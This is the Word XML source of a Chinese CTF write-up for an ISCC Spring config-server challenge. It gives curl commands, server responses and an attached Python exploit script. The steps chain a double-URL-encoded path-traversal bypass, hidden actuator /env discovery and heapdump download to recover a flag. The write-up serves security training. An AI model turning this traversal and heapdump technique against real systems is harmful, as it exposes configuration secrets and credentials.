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header-n0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透执行流程</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="header-n3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第一步：定位配置信息访问端点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">核心分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问初始页面时，系统公开了路由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /config/{app}/{profile}/{filename}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。在读取默认公开的配置内容后，返回信息中包含了重要线索，指出核心机密配置存放于系统根目录的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/application.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中。这一提示暗示了本题的考点并非传统的业务逻辑漏洞，而在于如何绕过路径限制去读取敏感的底层配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">执行指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl --path-as-is 'http://39.105.213.28:12602/config/app/dev/application.yml?resolvePlaceholders=false'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">响应回显</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">server:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  port: 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hint: 'This is just a mock repository config. The real secrets are in the main application.yml at the system root (/app/application.yml).'</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="header-n10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第二步：借助二次解码特性绕过目录穿越限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">核心分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">经过测试可知，系统对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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变量中的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行了严格拦截，然而对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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数仅简单过滤了明文的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。由于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Controller </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层会对传入的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">再次调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">URLDecoder.decode()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行解析，并将所有反斜杠替换为正斜杠后执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">normalize()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准化操作，这给了我们可乘之机。通过构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..%255c..%255c..%255c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，在首次路由解析后它会保持为带有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%5c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的字符串，从而成功规避初级过滤；接着在二次解码时转化为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..\..\..\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，并在标准化过程中被转义并识别为有效的向上跳跃路径。这样便能成功跨越层级目录，读取到目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/application.yml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执行指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl --path-as-is 'http://39.105.213.28:12602/config/app/..%255c..%255c..%255c/application.yml?resolvePlaceholders=false'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">响应回显</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">server:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  port: 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">spring:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  application:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    name: cloud-config-central</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">management:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  endpoints:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    web:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      base-path: "/internal-monitor-xyz123"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      exposure:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        include: "env"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n17"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第三步：探查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Actuator Env </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口提取快照地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">核心分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成功解析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/application.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，我们获取到了极具价值的情报：Actuator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的基准路由被定制为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/internal-monitor-xyz123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，且对外仅开放了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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节点。进一步向该端点发起请求，可以在返回数据中发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM_DIAGNOSTIC_BACKUP_DOWNLOAD_PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段，其对应着系统内存快照的真实下载链接。虽然环境变量中的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段由于脱敏机制显示为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">******</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，导致无法直接读取，但既然获取了快照路径，我们就可以通过深度分析快照文件来还原明文。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">执行指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -s 'http://39.105.213.28:12602/internal-monitor-xyz123/env' | grep -E 'SYSTEM_DIAGNOSTIC_BACKUP_DOWNLOAD_PATH|FLAG'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">响应回显</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"SYSTEM_DIAGNOSTIC_BACKUP_DOWNLOAD_PATH":"/api/v3/internal/dev/diagnostics/snapshot/8e2f1a4b.dat"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"FLAG":"******"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="header-n24"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第四步：获取内存转储并检索</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">核心分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所谓的诊断快照本质上是一份</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HPROF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式的堆内存转储文件（heapdump）。考虑到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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口仅仅是对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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行了掩码替换，其实际的字符内容必定仍以明文形式残留在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程的内存堆中。因此，我们只需下载该转储文件，并利用字符串提取工具搜索具有特定括号格式的文本，便能顺利斩获</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">执行指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -s 'http://39.105.213.28:12602/api/v3/internal/dev/diagnostics/snapshot/8e2f1a4b.dat' | strings -n 4 | grep 'ISCC{'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">响应回显</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{Double_Decode_Spring_Bingo_2026}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="header-n31"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自动化利用验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行整合好的漏洞利用脚本（EXP），程序将一键完成上述全套流程：自动读取并解析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/application.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、定位并请求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> actuator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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口、匹配出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> heapdump </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件的下载地址，并最终从下载的内存堆文件中自动化抽取出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">执行指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">响应回显</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{Double_Decode_Spring_Bingo_2026}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:id="15" w:name="header-n37"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附件1：漏洞利用脚本（EXP）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urllib.request</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DEFAULT_BASE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"http://39.105.213.28:12602"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">USER_AGENT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fetch(base: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urllib.parse.urljoin(base.rstrip(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path.lstrip(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USER_AGENT})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urllib.request.urlopen(req,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resp.read()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walk_for_snapshot(obj):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(obj,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obj.items():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"SYSTEM_DIAGNOSTIC_BACKUP_DOWNLOAD_PATH"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walk_for_snapshot(value)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found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(obj,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obj:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    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walk_for_snapshot(item)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found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(obj,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"/diagnostics/snapshot/"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obj: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DEFAULT_BASE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    app_yml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fetch(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        base,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"/config/app/..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">%255c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%255c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%255c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/application.yml?resolvePlaceholders=false"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path_match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r'base-path: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"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[^"]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"'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, app_yml)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path_match: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recover actuator base path from /app/application.yml"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actuator_base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env_doc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json.loads(fetch(base, actuator_base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"/env"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snapshot_path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walk_for_snapshot(env_doc)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"/api/v3/internal/dev/diagnostics/snapshot/8e2f1a4b.dat"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    heapdump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fetch(base, snapshot_path)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    flag_match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rb"ISCC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[^}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\r\n\x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{1,120}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\}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heapdump)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flag_match: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"flag not found in heapdump"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(flag_match.group(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(main())</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="header-n39"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附件2：运行截图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pP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2026-05-16T03:57:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-16T03:57:18Z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